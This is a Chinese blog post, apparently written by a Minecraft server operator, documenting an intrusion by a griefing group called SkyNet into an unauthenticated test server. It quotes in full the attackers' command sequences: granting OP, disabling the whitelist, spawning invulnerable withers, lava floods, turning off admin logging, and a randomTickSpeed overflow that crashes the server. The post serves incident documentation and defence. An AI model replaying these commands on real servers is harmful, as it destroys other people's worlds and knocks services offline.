【连载】MC炸服团伙SkyNet作案实录

avatar

MikeWu597

文章 评论 标签
239 12 1
最新回复
qiu_3_lian
qiu_3_lian
qiu_3_lian
qiu_3_lian
doge
Agatha
Agatha
看看能不能回复
Agatha
Agatha
开玩
开玩
支持一波
随便看看
2024 年 05 月 31 日
芬兰 · Terttu · Apr.10.2024
2024 年 12 月 23 日
德国 · Anna · Dec.23.2024
2024 年 12 月 06 日
德国 · Hanna · Dec.6.2024
首页
/ 技术 / 正文
文章内容受版权保护,权利人声明放弃信息网络传播权,允许转载但需注明出处。

北京时间2025年2月21日03:16,Agatha测试服临时存档(未启用认证插件,新生成的随机地形,供性能测试使用)喜迎知名炸服团伙SkyNet光顾。由于是临时存档,没有造成任何损失。 后续,我们索性保留测试服临时存档进行养蛊,又发现SkyNet回马枪,再次进服进行破坏性操作,截至文章发布,我们还在继续养蛊,并准备连载内容。 全过程记录如下。

03:16:32,OP账号_Waku_在IP地址 146.70.196.85 登录。
IP属地为匈牙利布达佩斯,与互联网上已有的关于SkyNet的文章高度重合。
猜测SkyNet获取OP玩家名称的方式为通过MOTD实时监测服务器在线列表。

03:16:33,_Waku_在3514毫秒内快速执行了以下指令,然后立即退出服务器:

 /gamerule sendCommandFeedback true
 /gamerule keepInventory false
 /op qiu_3_lian
 /defaultgamemode creative
 /pardon qiu_3_lian
 /gamerule doImmediateRespawn true
 /op _Waku_
 /gamerule mobGriefing true
 /pardon _Waku_

03:16:49,OP账号qiu_3_lian在IP地址 146.70.196.85 登录。

03:16:49,qiu_3_lian在8091毫秒内快速执行了以下指令:

/gamemode creative
/clear
/gamerule doImmediateRespawn true
/gamerule mobGriefing true
/gamerule doFireTick true
/difficulty hard
/execute as @a run summon minecraft:wither ~ ~ ~ {Invulnerable:1b,CustomName:'{"text":"MOUNTAINSOFLAVAINC T-800 Terminator","color":"red"}'}
/execute as @a run summon minecraft:wither ~ ~ ~ {Invulnerable:1b,CustomName:'{"text":"MOUNTAINSOFLAVAINC T-800 Terminator","color":"red"}'}
/execute as @a run summon minecraft:fireball ~ ~ ~ {Motion:[0.0,-5.0,0.0],ExplosionPower:127b,CustomName:'{"text":"WATCHMOUNTAINSOFLAVAINCONYOUTUBE","color":"red"}'}
/execute as @a run fill ~21 ~8 ~21 ~-21 ~-8 ~-21 lava
/execute as @a run fill ~22 ~8 ~21 ~64 ~-8 ~-21 lava
/execute as @a run fill ~-64 ~8 ~21 ~-22 ~-8 ~-21 lava
/execute as @a run fill ~21 ~8 ~22 ~-21 ~-8 ~64 lava
/execute as @a run fill ~21 ~8 ~-64 ~-21 ~-8 ~-22 lava
/execute as @a run fill ~90 ~ ~90 ~-90 ~ ~-90 lava
/execute as @a run fill ~90 ~20 ~90 ~-90 20 -90 lava
/execute at @e[type=!minecraft:player, type=!minecraft:wither] run fill ~-2 ~-2 ~-2 ~2 ~2 ~2 lava

最后一条指令为在实体周边fill岩浆。

供图:qiu_3_lian

之后等待170毫秒后继续执行了:

/scoreboard objectives add 3i4qf1oyoo dummy {"text":" !!!TERMINATED BY SKYNET!!! ---> Mountains of Lava Inc. ---> Please email any concerns to: molcomplaints@breakblocks.com"}
/scoreboard objectives setdisplay sidebar 3i4qf1oyoo
/team add mmkxu5ocf6
/team modify mmkxu5ocf6 suffix {"text":"                         ------>> Live Customer Support: ---> https://discord.com/invite/Az3G3p4ZCj"}
/team join mmkxu5ocf6 1
/scoreboard players set 1 3i4qf1oyoo 1
/save-all
/op _Waku_
/kill qiu_3_lian
/gamemode creative

继续等待511毫秒后,重复执行了上述的所有指令。

03:17:27,qiu_3_lian说: I'll be back. 并下线。

03:17:39,_Waku_使用同一IP进入服务器,除上述指令之外,还执行了:

/op Macrored
/pardon Macrored
/op 2wwwyyy
/whitelist off
/pardon 2wwwyyy
/op HELP_FRESH

03:17:46,另一个_Waku_从测试服备用入口登录,并把前一个_Waku_挤掉了。之后,执行了前面的大部分代码。

03:17:53,在_Waku_在线的情况下,qiu_3_lian再次上线,执行了前面的大部分代码。

供图:qiu_3_lian

03:18:16,_Waku_执行了:

/gamerule logAdminCommands false

这关闭了日志,但并未影响监控程序。之后,继续执行:

/gamerule randomTickSpeed 2147483647

这导致服务器直接进入dump流程。

07:48:05,ServerOverflow试图登录,被拒绝。

从上面的记录,可以推测SkyNet具有以下功能:

  1. IP扫描:可识别同IP段的所有Minecraft服务
  2. 端口爬取:非25565端口
  3. 脚本执行:所有的代码均为预设并以毫秒级速度提交服务器执行
  4. MOTD监控:实时监测服务器在线列表,获取OP用户名

运行组一致同意装死,继续养蛊,看看SkyNet还能整什么花活。

无标签
内容受版权保护,任何洗稿行为都将被监测,除非内容中声明了放弃其权利。
马来西亚 · Chezyda · 22.Feb.2025
« 上一篇
韩国 · Subin · Feb.25.2025
下一篇 »